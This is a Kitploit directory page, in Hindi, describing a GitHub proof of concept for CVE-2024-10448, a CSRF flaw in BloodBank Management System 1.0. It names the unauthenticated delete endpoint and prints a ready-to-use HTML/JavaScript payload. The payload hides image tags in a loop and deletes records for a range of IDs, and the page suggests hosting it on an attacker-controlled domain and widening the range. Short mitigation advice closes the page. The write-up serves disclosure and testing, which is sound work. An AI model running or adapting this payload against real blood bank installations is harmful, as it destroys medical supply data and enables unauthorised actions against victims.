Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10448 — रक्त बैंक CSRF अटैक POC | Kitploit
उपकरण/GitHubGitHub/bevennyamande/cve-2024-10448
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

रक्त बैंक CSRF अटैक POC

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रभावित संस्करण:

  • BloodBank Management System: 1.0

भेद्यता जानकारी:

  • भेद्यता प्रकार: क्रॉस साइट रिक्वेस्ट फोर्जरी (CSRF)
  • गंभीरता: HIGH
  • स्थिति: अनपैच्ड

भेद्य एंडपॉइंट:

  • पथ: /file/delete.php?bid=

भेद्यता विवरण:

BloodBank Management System के रक्त अनुरोध कार्यक्षमता में एक क्रॉस साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता खोजी गई। यह दोष तब उत्पन्न होता है जब इस पथ /file/delete.php?bid= पर एक delete अनुरोध भेजा जाता है, जिससे पैरामीटर एप्लिकेशन में हटाने के लिए एक रिकॉर्ड का चयन कर पाता है। हालाँकि, रक्त नमूने जोड़ने के आधार पर गतिशील होते हैं, इसलिए अनुरोध को सफल बनाने के लिए मैंने एक लूप के भीतर JavaScript-जनित इमेज टैग का उपयोग किया।

bid
bids

सफल शोषण से पीड़ित की ओर से अनधिकृत क्रियाएँ अर्थात डेटा विलोपन हो सकता है। इसके अतिरिक्त, पेलोड के साथ दुर्भावनापूर्ण वेबसाइटों पर जाकर भी इसका शोषण किया जा सकता है।


प्रूफ ऑफ कॉन्सेप्ट (PoC):

नीचे एक CSRF POC हमले का उदाहरण दिया गया है जो bid पैरामीटर के माध्यम से available blood samples को हटाता है, फ़ाइल को हमलावर-नियंत्रित डोमेन पर होस्ट करें, मेरे मामले में मैं localhost उपयोग कर रहा था:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


वीडियो POC

  • वीडियो लिंक

प्रभाव:

  • डेटा हेरफेर: हमलावर उपयोगकर्ताओं को दिखाई जाने वाली सामग्री को संशोधित कर सकते हैं।
  • प्रतिष्ठा क्षति: दुर्भावनापूर्ण व्यवहार के कारण उपयोगकर्ता सिस्टम पर भरोसा खो सकते हैं।

शमन अनुशंसाएँ:

  1. CSRF टोकन का उपयोग करें क्रॉस-डोमेन एक्सेस को रोकने के लिए तंत्र लागू करें या अपने अनुरोध में csrf tokens डालें और GET अनुरोधों को स्थिति बदलने वाली क्रियाएँ करने से भी बचें।

टूल डाउनलोड करें